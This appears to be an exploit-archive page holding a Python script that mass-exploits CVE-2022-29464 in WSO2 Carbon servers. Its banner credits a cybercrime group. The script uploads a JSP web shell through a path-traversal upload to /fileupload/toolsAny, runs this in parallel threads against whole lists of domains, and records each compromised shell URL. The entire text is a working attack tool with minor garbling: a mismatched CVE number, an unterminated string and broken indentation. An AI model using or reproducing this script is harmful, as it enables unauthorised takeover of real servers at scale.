4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve.py PY
import requests
import os
import urllib3
import concurrent.futures
from sys import stdout
from colorama import Fore, init
from concurrent.futures import ThreadPoolExecutor
init(autoreset=True)
delete_warning = urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

if not os.path.exists('Results'):
    os.mkdir('Results')

os.system('clear' if os.name == 'posix' else 'cls')

def banners():
    os.system('clear' if os.name == 'posix' else 'cls')
    stdout.write("                                                                                         \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$$$$$\   $$$$$$\   $$$$$$\      $$\      $$\ $$\     $$\ \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$  __$$\ $$  __$$\ $$  __$$\     $$$\    $$$ |\$$\   $$  | \n")
stdout.write(""+Fore.LIGHTRED_EX +"$$ /  \__|$$ /  \__|$$ /  \__|    $$$$\  $$$$ | \$$\ $$  / \n)
stdout.write(""+Fore.LIGHTRED_EX +"\$$$$$$\  $$ |      $$ |          $$\$$\$$ $$ |  \$$$$  / \n")
stdout.write(""+Fore.LIGHTRED_EX +" \____$$\ $$ |      $$ |          $$ \$$$  $$ |   \$$  / \n")  
stdout.write(""+Fore.LIGHTRED_EX +"$$\   $$ |$$ |  $$\ $$ |  $$\     $$ |\$  /$$ |    $$ | \n")   
stdout.write(""+Fore.LIGHTRED_EX +"\$$$$$$  |\$$$$$$  |\$$$$$$  |$$\ $$ | \_/ $$ |    $$ | \n")  
stdout.write(""+Fore.LIGHTRED_EX +"\______/  \______/  \______/ \__|\__|     \__|    \__| \n")
                                                           
stdout.write(""+Fore.YELLOW   +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")      stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"CVE-2022-29469 Exploiter By             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   SamuraiMelayu1337 | SynixCyberCrimeMY                                    "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB             "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   GITHUB.COM/S4MURAIMELAYU1337                         "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╔════════════════════════════════════════════════════════════════════════════╝\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"USING     "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   pip3 install -r requirements.txt                                "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"Thanks To  "+Fore.RED+"    |"+Fore.LIGHTWHITE_EX+"   All Member SynixCyberCrimeMY + Muslim Hackers                     "+Fore.YELLOW+"║\n")
    stdout.write(""+Fore.YELLOW   +"╚════════════════════════════════════════════════════════════════════════════╝\n")                           print(f"{Fore.YELLOW}[CVE-2022-29464] - {Fore.GREEN}PERFORM WITH MASS EXPLOITS WSO2 CARBON SERVER\n")
banners()

def exploit(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36', 'Content-Type': 'application/json'} # .MF, .jspx, .jspf, .jsw, .jsv, xml, .war, .jsp, .aspx
        files = {"../../../../repository/deployment/server/webapps/authenticationendpoint/shell.jsp": open("Files/shell.jsp", "rb")}

        resp = requests.post(f"{url}/fileupload/toolsAny", timeout=10, verify=False, files=files)

        if resp.status_code == 200 and len(resp.content) > 0 and 'java' not in resp.text:
            print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.RED} .: {Fore.GREEN}[W00T!] {Fore.YELLOW}- {Fore.GREEN}{url}/authenticationendpoint/shell.jsp")
            with open('Results/Results.txt', 'a') as f:
                f.write(f"{url}/authenticationendpoint/shell.jsp\n")
        else:
            print(f"{Fore.YELLOW}[CVE-2022-29464]{Fore.YELLOW} .: {Fore.RED}[Failed!] {Fore.YELLOW}- {Fore.RED}{url}")
    except KeyboardInterrupt:
        print(f"{Fore.CYAN}KeyboardInterrupt{Fore.RESET}")


def single_scan():
    url = input(f"{Fore.YELLOW}[DOMAIN/IP] {Fore.RED}.: {Fore.WHITE}")
    if not url.startswith("http"):
        url = "https://" + url
    exploit(url)


def mass_scan():
    urls_file = input(f"{Fore.YELLOW}[DOMAIN/IP LIST] {Fore.RED}.: {Fore.WHITE}")
    if not os.path.isfile(urls_file):
        print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!\n")
        return

    with open(urls_file, "r") as f:
        urls = f.read().splitlines()
    
    urls = [url if url.startswith("http") else "https://" + url for url in urls]

    try:
        max_threads = int(input(f"{Fore.YELLOW}[THREAD: 10-30] {Fore.RED}.: {Fore.WHITE}") or "10")

        with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as executor:
            results = [executor.submit(exploit, url) for url in urls]
    except KeyboardInterrupt:
        print(f"\n{Fore.RED}[KeyboardInterrupt]{Fore.RESET}")


def main():
    print(f"{Fore.RED}[1] - {Fore.YELLOW}SINGLE SCAN")
    print(f"{Fore.RED}[2] - {Fore.YELLOW}MASSIVE SCAN\n")

    choice = input(f"{Fore.YELLOW}[CVE-2022-29464] {Fore.RED}.: ")
    if choice == "1":
        single_scan()
    elif choice == "2":
        mass_scan()
    else:
        print(f"{Fore.RED}WHUT ARE YOU DOIN? FILE NOT FOUND!")


if __name__ == '__main__':
    main()